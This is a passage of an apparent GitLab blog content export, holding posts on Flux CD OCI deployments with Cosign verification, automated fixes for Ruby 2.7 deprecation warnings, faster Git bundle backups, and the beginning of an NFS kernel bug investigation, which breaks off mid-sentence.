AgAKgLf4VbVzJOmr6++k81LlFayx88AELaUQFNOaXmBF4G+fBfBYeABl0skNvMAa1UrPVNSfMIHgFoYHoO96g576a+epk6V6glOI+++XvYbfsygof3GGxe0nL5Qh2b3ge0fNpyd0kTPSjTj0YUhRhKtMGMRSRw1jrwhNcGxCHK+Byibs52v8Np49KsIkeZKbzLdgYABkrv+k0j7hQM+jR180NpG+2UiRvaXpPuogxkbj61FEqWGrJHk8IVyfl3eh+YhoXxOHGDqko6SUC+bUZPDBlU6yKegO0/8Zq3hwulrSEsEjzRZNK+RFVMOLWWuC6h+WGpYhAMcsZPwjjJ/y29KLNa/YeqkN/cdk488QyEFc6ehCxzhH67HxIn2PDa+KkEOTv2TuycGF+Q00jKIizXF+IwLx/oRb3pTCF0AoAY8D8N3Ey+KfkOjsBON7gGID8GbQiJqX2IgIZxFMk0JRzxbRKOEqn+guLd5Shj7CD1a1Mkk0DxBdbqrGv2XNYUaFPI7xd3rZXUJZlnv+fsmwswsiGWRuXwim45HScWzQnfgLAe7tv3spVEGeaO5apl6d89uN21PBQnfE/zyugB//7ZW9tSp6+CSMyc5HynxI8diafqiwKPgvzLmVWRnkvxJijoXicRr3sCo5RudZPSlnjfd7CKdhwEVvLl7dRR4e/XBMdxCzk1p52Pl+3/kJR+LJii5+iwOpYrpVltSZdzc/3qRd19yMpc9PWpXYi7HxTb24EOQ25i21eDJY1ceplDN6bRtop2quzkjlwVeE2i4cEsX/YG8QBtQbop/3fjiAjKaED3QH3Ul0PECS9ARTScSkcOL3I00Xpp8DyD+xH0/i9wCBRDmH3yKX18C8VrMq02ALSnlP7WCVVjCPzubqKx2LPZRxK9EG0fylwv/vWQzTUUwfbPQZsd4c75bSTsTvxqp/UcFaXA==\n  template:\n    metadata:\n      name: cosign-public-key\n      namespace: frontend-dev\n---\napiVersion: source.toolkit.fluxcd.io/v1beta2\nkind: OCIRepository\nmetadata:\n    name: frontend\n    namespace: frontend-dev\nspec:\n    interval: 1m\n    url: oci://registry.gitlab.com/gitlab-da/projects/tanuki-bank/tanuki-bank-delivery/frontend\n    ref:\n        tag: dev\n    verify:\n      provider: cosign\n      secretRef:\n        name: cosign-public-key\n---\napiVersion: kustomize.toolkit.fluxcd.io/v1\nkind: Kustomization\nmetadata:\n    name: frontend\n    namespace: frontend-dev\nspec:\n    interval: 1m\n    targetNamespace: frontend-dev\n    path: \".\"\n    sourceRef:\n        kind: OCIRepository\n        name: frontend\n    prune: true\n```\n\nThe [`Kustomization`](https://fluxcd.io/flux/components/kustomize/kustomizations/) resource allows for further customization of Kubernetes manifests and also specifies which namespace to deploy resources to. The `OCIRepository` resource for Flux CD allows users to specify the OCI image repository reference and tag to regularly sync from. Additionally, you will notice the `verify.provider` and `verify.secretRef` properties. These fields allow you to verify that the OCI image deployed to the cluster was signed by the corresponding Cosign private key used in the earlier CI/CD job.\n\nThe public key needs to be stored in a [Kubernetes secret](https://kubernetes.io/docs/concepts/configuration/secret/) that will need to be present in the same namespace as the `OCIRepository` resource. To have this secret managed by Flux CD and not store the secret in plain text, you can consider using [SealedSecrets](https://fluxcd.io/flux/guides/sealed-secrets/) to encrypt the value and have it be decrypted cluster side by a controller.\n\nFor a simpler approach not requiring SealedSecrets, you can [deploy the secret via a GitLab CI/CD](https://docs.gitlab.com/ee/user/clusters/agent/getting_started_deployments.html) job using the [`kubectl CLI`](https://kubernetes.io/docs/reference/kubectl/). In the non-sealed secret approach, you would simply remove the SealedSecret included above and run the job to deploy the public key secret before running the job to push the new OCI image. This will make sure the secret is stored securely in GitLab and make sure the secret can be accessed on the cluster by the OCIRepository. While this approach is a bit simpler, just note this is not a suitable approach for managing secrets in production.\n\n## The benefits of OCI, GitLab, and GitOps\n\nOCI artifacts allow for GitOps teams to take deployments even further with added security benefits and allowing for deployments to be minimal. Users still gain all the benefits offered by git as far as having a source of truth for infrastructure and collaborating on projects. OCI images add a packaging approach that improves the deployment aspect of GitOps.\n\nGitLab continues to learn from our customers and the cloud native community on building experiences that help simplify GitOps workflows. To get started using some of the features mentioned in this blog, you can sign up for a [60-day free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/). We would also love to hear from users about their experiences with these tools, and you can provide feedback in the [community forum](https://forum.gitlab.com/t/oci-images-as-source-of-truth-for-gitops-with-gitlab/120965).\n",[109,9,1038,537,751,752],{"slug":3210,"featured":6,"template":689},"how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery","content:en-us:blog:how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery.yml","How To Use Oci Images As The Source Of Truth For Continuous Delivery","en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery.yml","en-us/blog/how-to-use-oci-images-as-the-source-of-truth-for-continuous-delivery",{"_path":3216,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3217,"content":3223,"config":3229,"_id":3231,"_type":14,"title":3232,"_source":16,"_file":3233,"_stem":3234,"_extension":19},"/en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings",{"title":3218,"description":3219,"ogTitle":3218,"ogDescription":3219,"noIndex":6,"ogImage":3220,"ogUrl":3221,"ogSiteName":673,"ogType":674,"canonicalUrls":3221,"schema":3222},"How we automatically fixed thousands of Ruby 2.7 deprecation warnings","The upgrade to Ruby 2.7 for GitLab involved thousands of deprecation warnings across hundreds of files. Here's how we fixed most of them.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681882/Blog/Hero%20Images/daria-nepriakhina-zNU3ErDAbAw-unsplash.jpg","https://about.gitlab.com/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we automatically fixed thousands of Ruby 2.7 deprecation warnings\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Thong Kuah\"}],\n        \"datePublished\": \"2021-02-03\",\n      }",{"title":3218,"description":3219,"authors":3224,"heroImage":3220,"date":3226,"body":3227,"category":801,"tags":3228},[3225],"Thong Kuah","2021-02-03","\n\nRuby 3.0 was just released on Dec. 25, 2020, with some new features and some breaking changes.\nGitLab was at Ruby 2.6, and we wanted to upgrade to Ruby 2.7 in preparation to eventually upgrade to Ruby 3.\n\nIn Ruby 3.0, [positional and keyword arguments will be separated](https://www.ruby-lang.org/en/news/2019/12/12/separation-of-positional-and-keyword-arguments-in-ruby-3-0/). To help developers prepare for this, in Ruby 2.7,\nwarnings were added. In GitLab, we discovered we have [thousands\nof such warnings](https://gitlab.com/gitlab-org/gitlab/-/issues/257438) across hundreds of files:\n\n```\nwarning: Using the last argument as keyword parameters is deprecated; maybe ** should be added to the call\n```\n\n## Boring solutions\n\nTo address this warning, the obvious, and boring solution was to simply add `**` to the last keyword argument.\nFor the most part, this is what we did. However, while this was under way, we also developed a RuboCop check that could\ndetect, and automatically fix the keyword arguments. The benefit for this approach was that we can\n[autocorrect](https://docs.rubocop.org/rubocop/usage/auto_correct.html) any existing warnings en masse.\n\nThe tricky part about this is that RuboCop is designed to statically analyze Ruby code, whereas the warnings were\ngenerated by Ruby at runtime.\n\n## A way forward\n\nAfter some research, we found a way to utilize our comprehensive RSpec test suite to\ngather all the warnings using the [Deprecation Toolkit gem](https://github.com/shopify/deprecation_toolkit). We also\nconsidered using the [warning gem](https://github.com/jeremyevans/ruby-warning) at one point, but preferred Deprecation Toolkit\nas the results were easier to process.\n\nDeprecation Toolkit supports RSpec out of the box, so it was really simple to configure. It also has a simple YAML-based file format to record all deprecations. We then adapted this to record deprecation warnings for Ruby 2.7\nlast keyword arguments with:\n\n```ruby\n  kwargs_warnings = [\n    # Taken from https://github.com/jeremyevans/ruby-warning/blob/1.1.0/lib/warning.rb#L18\n    %r{warning: (?:Using the last argument (?:for `.+' )?as keyword parameters is deprecated; maybe \\*\\* should be added to the call|Passing the keyword argument (?:for `.+' )?as the last hash parameter is deprecated|Splitting the last argument (?:for `.+' )?into positional and keyword parameters is deprecated|The called method (?:`.+' )?is defined here)\\n\\z}\n  ]\n  DeprecationToolkit::Configuration.warnings_treated_as_deprecation = kwargs_warnings\n```\n\nLastly, we wrote a new RuboCop check, called\n[`Lint/LastKeywordArgument`](https://gitlab.com/gitlab-org/gitlab/-/blob/632b7768f7f9014951170a006489d66b34001c68/rubocop/cop/lint/last_keyword_argument.rb),\nthat checks against the YAML files generated by Deprecation Toolkit, and\ngenerates offenses. Now we can very quickly, statically check the whole GitLab\ncodebase, and even autocorrect! You can see how [Deprecation Toolkit and the\n`LastKeywordArgument` check was put together in this merge\nrequest](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47720). You can\nsee a sample output from running the `LastKeywordArgument` cop check:\n\n![LastKeywordArgument RuboCop offenses](https://about.gitlab.com/images/blogimages/last-keyword-argument-rubocop-offenses.png){: .shadow.center}\nSample output from running the `LastKeywordArgument` cop check\n{: .note .text-center}\n\n## Automatically fix everything\n\nNow we have an automatic RuboCop check, which can also autocorrect, we create merge requests to autocorrect!\nFor example, we autocorrected 62 instances across [39 spec files](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48407).\nAutomation for the win!\n\nWe then went one step further, and integrated this in our GitLab CI pipelines. Using the `artifacts` feature of GitLab CI, we\ngathered the `deprecations` directory from all RSpec jobs (we have about 400 such jobs). After all the RSpec jobs have passed, we then made a `post-test` job to\n[check the results](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49792) with the `LastKeywordArgument` cop. Below is a\nsnippet of the GitLab CI `.gitlab-ci.yml` configuration:\n\n```yaml\nstages:\n  - test\n  - post-test\n\n# This inherited job is used by all RSpec jobs\n.rspec-base:\n  stage: test\n  artifacts:\n    - deprecations/\n\n# GitLab CI job artifacts from previous stages are passed to this job\nrspec:deprecations:\n  stage: post-test\n  script:\n    - bundle exec rubocop --only Lint/LastKeywordArgument --parallel\n  artifacts:\n    - deprecations/\n```\n\nThis enabled us to have a single job where [we can see all deprecation warnings](https://gitlab.com/gitlab-org/gitlab/-/jobs/991299621).\n\n## Conclusion\n\nWith this measure we went from about 30,000 warnings related to keyword arguments to about 800 remaining warnings, largely stemming from\ndependencies. Feel free to follow our progress in [GitLab issue #257438](https://gitlab.com/gitlab-org/gitlab/-/issues/257438), and contribute to\nfix the remaining warnings if you are interested!\n\nCover image by [Daria Nepriakhina](https://unsplash.com/@epicantus) on [Unsplash](https://unsplash.com/photos/zNU3ErDAbAw)\n{: .note}\n",[9],{"slug":3230,"featured":6,"template":689},"how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings","content:en-us:blog:how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings.yml","How We Automatically Fixed Hundreds Of Ruby 2 7 Deprecation Warnings","en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings.yml","en-us/blog/how-we-automatically-fixed-hundreds-of-ruby-2-7-deprecation-warnings",{"_path":3236,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3237,"content":3243,"config":3250,"_id":3252,"_type":14,"title":3253,"_source":16,"_file":3254,"_stem":3255,"_extension":19},"/en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"title":3238,"description":3239,"ogTitle":3238,"ogDescription":3239,"noIndex":6,"ogImage":3240,"ogUrl":3241,"ogSiteName":673,"ogType":674,"canonicalUrls":3241,"schema":3242},"How we decreased GitLab repo backup times from 48 hours to 41 minutes","Learn how we tracked a performance bottleneck to a 15-year-old Git function and fixed it, leading to enhanced efficiency that supports more robust backup strategies and can reduce risk.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097166/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097166565.png","https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we decreased GitLab repo backup times from 48 hours to 41 minutes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Karthik Nayak\"},{\"@type\":\"Person\",\"name\":\"Manuel Kraft\"}],\n        \"datePublished\": \"2025-06-05\",\n      }",{"title":3238,"description":3239,"authors":3244,"heroImage":3240,"date":3247,"body":3248,"category":801,"tags":3249},[3245,3246],"Karthik Nayak","Manuel Kraft","2025-06-05","Repository backups are a critical component of any robust disaster recovery strategy. However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging.  Our own [Rails repository](https://gitlab.com/gitlab-org/gitlab) was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally. \n\nUltimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, __reducing backup times exponentially__. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.\n\nThis turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it. \n\n## Backup at scale\n\nFirst, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:\n\n* **Time-prohibitive backups:** For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups. \n* **Resource intensity:** Extended backup processes can consume substantial server resources, potentially impacting other operations.\n* **Backup windows:** Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.\n* **Increased failure risk:** Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.\n* **Race conditions:** Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.\n\nThese challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.\n\nNow, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.\n\n## The technical challenge\n\nGitLab's repository backup functionality relies on the [`git bundle create`](https://git-scm.com/docs/git-bundle) command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.\n\nHowever, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.\n\n### Root cause analysis\n\nTo identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.\n\n![Flame graph showing command during execution](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg)\n\nA flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.\n\nWhen examining the flame graph of `git bundle create` running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the `object_array_remove_duplicates()` function. This function was introduced to Git in the [commit b2a6d1c686](https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686) (bundle: allow the same ref to be given more than once, 2009-01-17).\n\nTo understand this change, it's important to know that `git bundle create` allows users to specify which references to include in the bundle. For complete repository bundles, the `--all` flag packages all references.\n\nThe commit addressed a problem where users providing duplicate references through the command line – such as `git bundle create main.bundle main main` - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested `for` loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.\n\n### The fix: From O(N²) to efficient mapping\n\nTo resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.\n\nThis change dramatically enhances the performance of `git bundle create` and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.\n\n```shell\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ): \t14.653 s ±  0.203 s\t[User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s\t10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):  \t2.394 s ±  0.023 s\t[User: 1.684 s, System: 0.798 s]\n  Range (min … max):\t2.364 s …  2.425 s\t10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n\t6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nThe patch was accepted and [merged](https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d) into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.\n\n## The result: Dramatically decreased backup times\n\nThe performance gains from this improvement have been nothing short of transformative:\n\n* **From 48 hours to 41 minutes:** Creating a backup of our largest repository (`gitlab-org/gitlab`) now takes just 1.4% of the original time.\n* **Consistent performance:** The improvement scales reliably across repository sizes.\n* **Resource efficiency:** We significantly reduced server load during backup operations.\n* **Broader applicability:** While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.\n\n## What this means for GitLab customers\n\nFor GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:\n* **Transformed backup strategies**   \n  * Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.   \n  * Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.  \n* **Enhanced business continuity**  \n  * With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.  \n* **Reduced operational overhead**   \n  * Less server resource consumption and shorter maintenance windows.  \n  * Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.  \n* **Future-proofed infrastructure**   \n  * Growing repositories no longer force difficult choices between backup frequency and system performance.   \n  * As your codebase expands, your backup strategy can scale seamlessly alongside it\n\nOrganizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.\n\nStarting with the [GitLab 18.0](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/) release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their [backup](https://docs.gitlab.com/administration/backup_restore/backup_gitlab/) strategy and execution. There is no further change in configuration required.\n\n## What's next\n\nThis breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.\n\nWe're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.\n\n> Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. [Register today!](https://about.gitlab.com/eighteen/)",[751,9,1495,753,482],{"slug":3251,"featured":91,"template":689},"how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes","content:en-us:blog:how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes.yml","How We Decreased Gitlab Repo Backup Times From 48 Hours To 41 Minutes","en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes.yml","en-us/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes",{"_path":3257,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3258,"content":3264,"config":3270,"_id":3272,"_type":14,"title":3273,"_source":16,"_file":3274,"_stem":3275,"_extension":19},"/en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug",{"title":3259,"description":3260,"ogTitle":3259,"ogDescription":3260,"noIndex":6,"ogImage":3261,"ogUrl":3262,"ogSiteName":673,"ogType":674,"canonicalUrls":3262,"schema":3263},"How we spent two weeks hunting an NFS bug in the Linux kernel","Here's an in-depth recap of debugging a GitLab issue that culminated in a patch for the Linux kernel.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672173/Blog/Hero%20Images/nfs-bug-hunt-detective.jpg","https://about.gitlab.com/blog/how-we-spent-two-weeks-hunting-an-nfs-bug","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we spent two weeks hunting an NFS bug in the Linux kernel\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Stan Hu\"}],\n        \"datePublished\": \"2018-11-14\",\n      }",{"title":3259,"description":3260,"authors":3265,"heroImage":3261,"date":3267,"body":3268,"category":801,"tags":3269},[3266],"Stan Hu","2018-11-14","\n\nUPDATE 2019-08-06: This bug has now been resolved in the following\ndistributions:\n\n* [Red Hat Enterprise Linux 7](https://access.redhat.com/errata/RHSA-2019:2029)\n* [Ubuntu](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1802585)\n* Linux mainline: Backported to [4.14-stable](https://lkml.org/lkml/2019/8/2/562) and [4.19-stable](https://lkml.org/lkml/2019/8/2/639)\n\nOn Sep. 14, the GitLab support team escalated a critical\nproblem encountered by one of our customers: GitLab would run fine for a\nwhile, but after some time users encountered errors. When attempting to\nclone certain repositories via Git, users would see an opaque `Stale\nfile error` message. The error message persisted for a long time,\nblocking employees from being able to work, unless a system\nadministrator intervened manually by running `ls` in the directory\nitself.\n\nThus launched an investigation into the inner workings of Git and the\nNetwork File System (NFS). The investigation uncovered a bug with the\nLinux v4.0 NFS client and culiminated with a [kernel patch that was written by\nTrond Myklebust](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=be189f7e7f03de35887e5a85ddcf39b91b5d7fc1)\nand [merged in the latest mainline Linux kernel](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=c7a2c49ea6c9eebbe44ff2c08b663b2905ee2c13)\non Oct. 26.\n\nThis post describes the journey of investigating the issue and\ndetails the thought process and tools by which we tracked down the\nbug. It was inspired by the fine detective work in [How I spent two\nweeks hunting a memory leak in Ruby](http://www.be9.io/2015/09/21/memory-leak/)\nby Oleg Dashevskii.\n\nMore importantly, this experience exemplifies how open source software\ndebugging has become a team sport that involves expertise across\nmultiple people, companies, and locations. The GitLab motto \"[everyone can\ncontribute](/company/mission/#mission)\" applies not only to GitLab itself, but also to other open\nsource projects, such as the Linux kernel.\n\n## Reproducing the bug\n\nWhile we have run NFS on GitLab.com for many years, we have stopped\nusing it to access repository data across our application\nmachines. Instead, we have [abstracted all Git calls to\nGitaly](/blog/the-road-to-gitaly-1-0/).\nStill, NFS remains a supported configuration for our customers who\nmanage their own installation of GitLab, but we had never seen the exact\nproblem described by the customer before.\n\n[Our customer gave us a few important clues](https://gitlab.com/gitlab-org/gitlab-ce/issues/51437):\n\n1. The full error message read, `fatal: Couldn't read ./packed-refs: Stale file handle`.\n2. The error seemed to start when they started a manual Git garbage\ncollection run via `git gc`.\n3. The error would go away if a system administrator ran `ls` in the\ndirectory.\n4. The error also would go away after `git gc` process ended.\n\nThe first two items seemed obviously related. When you push to a branch\nin Git, Git creates a loose reference, a fancy name for a file that\npoints your branch name to the commit. For example, a push to `master`\nwill create a file called `refs/heads/master` in the repository:\n\n```bash\n$ cat refs/heads/master\n2e33a554576d06d9e71bfd6814ee9ba3a7838963\n```\n\n`git gc` has several jobs, but one of them is to collect these loose\nreferences (refs) and bundle them up into a single file called\n`packed-refs`. This makes things a bit faster by eliminating the need to\nread lots of little files in favor of reading one large one. For\nexample, after running `git gc`, an example `packed-refs` might look\nlike:\n\n```\n# pack-refs with: peeled fully-peeled sorted\n564c3424d6f9175cf5f2d522e10d20d781511bf1 refs/heads/10-8-stable\nedb037cbc85225261e8ede5455be4aad771ba3bb refs/heads/11-0-stable\n94b9323033693af247128c8648023fe5b53e80f9 refs/heads/11-1-stable\n2e33a554576d06d9e71bfd6814ee9ba3a7838963 refs/heads/master\n```\n\nHow exactly is this `packed-refs` file created? To answer that, we ran\n`strace git gc` with a loose ref present. Here are the pertinent lines\nfrom that:\n\n```\n28705 open(\"/tmp/libgit2/.git/packed-refs.lock\", O_RDWR|O_CREAT|O_EXCL|O_CLOEXEC, 0666) = 3\n28705 open(\".git/packed-refs\", O_RDONLY) = 3\n28705 open(\"/tmp/libgit2/.git/packed-refs.new\", O_RDWR|O_CREAT|O_EXCL|O_CLOEXEC, 0666) = 4\n28705 rename(\"/tmp/libgit2/.git/packed-refs.new\", \"/tmp/libgit2/.git/packed-refs\") = 0\n28705 unlink(\"/tmp/libgit2/.git/packed-refs.lock\") = 0\n```\n\nThe system calls showed that `git gc` did the following:\n\n1. Open `packed-refs.lock`. This tells other processes that `packed-refs` is locked and cannot be changed.\n1. Open `packed-refs.new`.\n1. Write loose refs to `packed-refs.new`.\n1. Rename `packed-refs.new` to `packed-refs`.\n1. Remove `packed-refs.lock`.\n1. Remove loose refs.\n\nThe fourth step is the key here: the rename where Git puts `packed-refs`\ninto action. In addition to collecting loose refs, `git gc` also\nperforms a more expensive task of scanning for unused objects and\nremoving them. This task can take over an hour for large\nrepositories.\n\nThat made us wonder: for a large repository, does `git gc` keep the file\nopen while it's running this sweep? Looking at the `strace` logs and\nprobing the process with `lsof`, we found that it did the following:\n\n![Git Garbage Collection](https://about.gitlab.com/images/blogimages/nfs-debug/git-gc-diagram.svg)\n\nNotice that `packed-refs` is closed only at the end, after the potentially\nlong `Garbage collect objects` step takes place.\n\nThat made us wonder: how does NFS behave when one node has `packed-refs`\nopen while another renames over that file?\n\nTo experiment, we asked the customer to run the following experiment on\ntwo different machines (Alice and Bob):\n\n1. On the shared NFS volume, create two files: `test1.txt` and\n`test2.txt` with different contents to make it easy to distinguish them:\n\n    ```bash\n    alice $ echo \"1 - Old file\" > /path/to/nfs/test1.txt\n    alice $ echo \"2 - New file\" > /path/to/nfs/test2.txt\n    ```\n\n2. On machine Alice, keep a file open to `test1.txt`:\n\n    ```bash\n     alice $ irb\n     irb(main):001:0> File.open('/path/to/nfs/test1.txt')\n    ```\n\n3. On machine Alice, show the contents of `test1.txt` continuously:\n\n    ```bash\n    alice $ while true; do cat test1.txt; done\n    ```\n\n4. Then on machine Bob, run:\n\n    ```bash\n    bob $ mv -f test2.txt test1.txt\n    ```\n\nThis last step emulates what `git gc` does with `packed-refs` by\noverwriting the existing file.\n\nOn the customer's machine, the result looked something like:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\ncat: test1.txt: Stale file handle\n```\n\nBingo! We seemed to reproduce the problem in a controlled way. However,\nthe same experiment using a Linux NFS server did not have this\nproblem. The result was what you would expect: the new contents were\npicked up after the rename:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\n2 - New file  \u003C--- RENAME HAPPENED\n2 - New file\n2 - New file\n```\n\nWhy the difference in behavior? It turns out that the customer was using\nan [Isilon NFS\nappliance](https://www.dellemc.com/en-us/storage/isilon/index.htm) that\nonly supported NFS v4.0. By switching the mount parameters to v4.0 via\nthe `vers=4.0` parameter in `/etc/fstab`, the test revealed a different\nresult with the Linux NFS server:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\n1 - Old file \u003C--- RENAME HAPPENED\n1 - Old file\n1 - Old file\n```\n\nInstead of a `Stale file handle`, the Linux NFS v4.0 server showed stale\n*contents*. It turns out this difference in behavior can be explained by\nthe NFS spec. From [RFC\n3010](https://tools.ietf.org/html/rfc3010#page-153):\n\n> A filehandle may or may not become stale or expire on a rename.\n> However, server implementors are strongly encouraged to attempt to keep\n> file handles from becoming stale or expiring in this fashion.\n\nIn other words, NFS servers can choose how to behave if a file is\nrenamed; it's perfectly valid for any NFS server to return a `Stale file\nerror` when that happens. We surmised that even though the results were\ndifferent, the problem was likely related to the same issue. We\nsuspected some cache validation issue because running `ls` in the\ndirectory would \"clear\" the error. Now that we had a reproducible test\ncase, we asked the experts: the Linux NFS maintainers.\n\n## False path: NFS server delegations\n\nWith a clear set of reproduction steps, I [sent an email to the Linux\nNFS mailing list](https://marc.info/?l=linux-nfs&m=153721785231614&w=2)\ndescribing what we had found. Over the week, I went back and forth with\nBruce Fields, the Linux NFS server maintainer, who suggested this was a\nNFS bug and that it would be useful to look at the network traffic. He\nthought there might be an issue with NFS server delegations.\n\n### What is an NFS server delegation?\n\nIn a nutshell, NFS v4 introduced server delegations as a way to speed up file access. A server can\ndelegate read or write access to a client so that the client doesn't\nhave to keep asking the server whether that file has changed by another\nclient. In simpler terms, a write delegation is akin to someone lending\nyou a notebook and saying, \"Go ahead and write in here, and I'll take it\nback when I'm ready.\" Instead of having to ask to borrow the notebook\nevery time you want to write a new paragraph, you have free rein until\nthe owner reclaims the notebook. In NFS terms, this reclamation process\nis called a delegation recall.\n\nIndeed, a bug in the NFS delegation recall might explain the `Stale file\nhandle` problem. Remember that in the earlier experiment, Alice had\nan open file to `test1.txt` when it was replaced by `test2.txt` later.\nIt's possible that the server failed to recall the delegation on\n`test1.txt`, resulting in an incorrect state. To check whether this was\nan issue, we turned to `tcpdump` to capture NFS traffic and used\nWireshark to visualize it.\n\n[Wireshark](https://www.wireshark.org/) is a wonderful open source tool\nfor analyzing network traffic, and it's especially good for viewing NFS\nin action. We captured a trace using the following command on the NFS server:\n\n```\ntcpdump -s 0 -w /tmp/nfs.pcap port 2049\n```\n\nThis command captures all NFS traffic, which typically is on TCP port 2049.\nBecause our experiment worked properly with NFS v4.1 but did not\n with NFS v4.0, we could compare and contrast how NFS behaved\nin a non-working and a working case. With Wireshark, we saw the\nfollowing behavior:\n\n### NFS v4.0 (stale file case)\n\n![NFS v4.0 flow](https://about.gitlab.com/images/blogimages/nfs-debug/nfs-4.0-flow.svg)\n\nIn this diagram, we can see in step 1 Alice opens `test1.txt` and gets\nback an NFS file handle along with a `stateid` of 0x3000. When Bob\nattempts to rename the 